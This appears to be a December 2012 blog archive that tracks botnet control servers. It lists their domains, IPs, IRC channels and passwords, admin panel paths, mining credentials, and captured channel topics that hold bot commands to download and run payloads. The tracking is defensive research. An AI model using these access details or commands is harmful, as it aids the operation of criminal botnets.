Month: December 2012

w4hw5wg3488h.net (snk asper mod botnet hosted by United Kingdom Birmingham Compuweb Communications Services Limited)

Uncategorized

Resolved w4hw5wg3488h.net to 62.255.175.157

snk is back, using an old domain and buying bots from Heckforums skids.

Server: w4hw5wg3488h.net
Port: 5050
Channel: #$
* Topic for #$ is: ,
* Topic for #$ set by x at Sat Dec 22 16:42:47 2012
Channel: #lol
* Topic for #lol is: .d /100/97/111/124/49/59/47/105/111/111/102/66/103/119/105/115/118/101/109/120/103/126/56/111/112/38/112/78/51/100/111/62/70/112/98/
* Topic for

bootcamp4wealth.com (Ice 9 banking malware hosted by wiredtree.com)

Uncategorized

Resolved bootcamp4wealth.com to 173.199.181.60

Server: bootcamp4wealth.com
Gate file: bootcamp4wealth.com/wp-directory/images/config/adm/gate.php
Config file: bootcamp4wealth.com/wp-directory/images/config/config/index.php
Login page: bootcamp4wealth.com/wp-directory/images/config/adm/index.php?m=login

Anyone infected with this is safe for now, as the owner hasn't figured out that the bot and the config dropper need the same key for it to work.

Hosting info: http://whois.domaintools.com/173.199.181.60

qwer.be (YZF ddos botnet hosted by metrabyte.co.th)

Uncategorized

Resolved qwer.be to 119.59.99.200

Server: qwer.be
Gate file: /1234567/cmd.php

Information for building HTTP requests is stored in /1234567/sys/ as text files renamed to PNGs.

http://qwer.be/1234567/sys/UserAgent.png
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

x.n-0-r-1.org (ngr irc botnet hosted by Russian Federation Saint Petersburg Selectel Ltd.)

Uncategorized

This botnet has lots of domains, none of which are resolving at the moment:

x.n-0-r-1.org
x.n0r1.org
x.n2rx.asia
x.n1rx.asia
x.n0r2.asia
x.n0r1.asia
x.dload.ws
x.xd11.in

You can still connect to the server using its IP address though.

Server: 31.186.102.189
Port: 80
Server password: 666666
Channel: ##CBC-x01##
* Topic for ##CBC-x01## is: !m on !mod usbi on !NAZEL

www.btcminers.biz (Bitcoin miner hosted in Russian Federation Saint Petersburg Selectel Ltd.)

Uncategorized

Resolved: [www.btcminers.biz] To [31.186.102.189]
Resolved: [www.btcminers.biz] To [31.186.102.182]

http://www.btcminers.biz:789/ -u m2n3r_A -p refghvytre

Captured request (the ASCII column of the packet dump, reassembled; ".." marks the line endings):

POST / HTTP/1.1..
Authorization: Basic bTJuM3JfQTpyZWZnaHZ5dHJl..
Content-Length: 43..
User-Agent: Ufasoft bitcoin-miner/0.20 (Windows NT XP 5.1.2600 Service Pack 2)..
Host: localhost:789..
Cache-Control: no-cach

f0010.info (ngr irc botnet hosted by perfectip.net)

Uncategorized

Resolved f0010.info to 64.56.64.29, 64.56.64.26

Server: f0010.info
Port: 1887
Server password: leonis
Channel: #pool
Channel password: leonis
* Topic for #pool is: ~pu hxxp://www.sendspace.com/pro/dl/ishh04 1f88bb85c51290b759d16dda9fff692d ~s -o ~s
* Topic for #pool set by google at Mon Dec 17 12:16:33 2012

Bots also join the channel for their country, e.g. #US, and operating system,

bid.consulting-info.eu (Click fraud botnet hosted by quadranet.com)

Uncategorized

Resolved bid.consulting-info.eu to s1.fclick.org (CNAME)
Resolved s1.fclick.org to 96.44.149.187

Server: bid.consulting-info.eu
Gate file: /feed/xml.php?uid=219

More click fraud courtesy of French hecker h4r3. This time it looks a bit more sophisticated though. I'm assuming this is an affiliate program, as while it's using h4r3's domain it points to another site. If you search for

74.208.111.48 (HEX reptile mod hosted by 1and1.com)

Uncategorized

ALiSs has found a new net.

Server: 74.208.111.48
Port: 1866
Channel: #!h!
* Topic for #!h! is: .load /99/106/112/81/55/59/40/105/121/99/108/102/45/111/98/115/102/103/110/97/108/101/120/8/64/119/114/53/122/126/122/126/117/113/100/83/46/112/124/64/40/46/102/126/105/
* Topic for #!h! set by wweras at Fri Dec 14 20:55:55 2012

Hosting info: http://whois.domaintools.com/74.208.111.48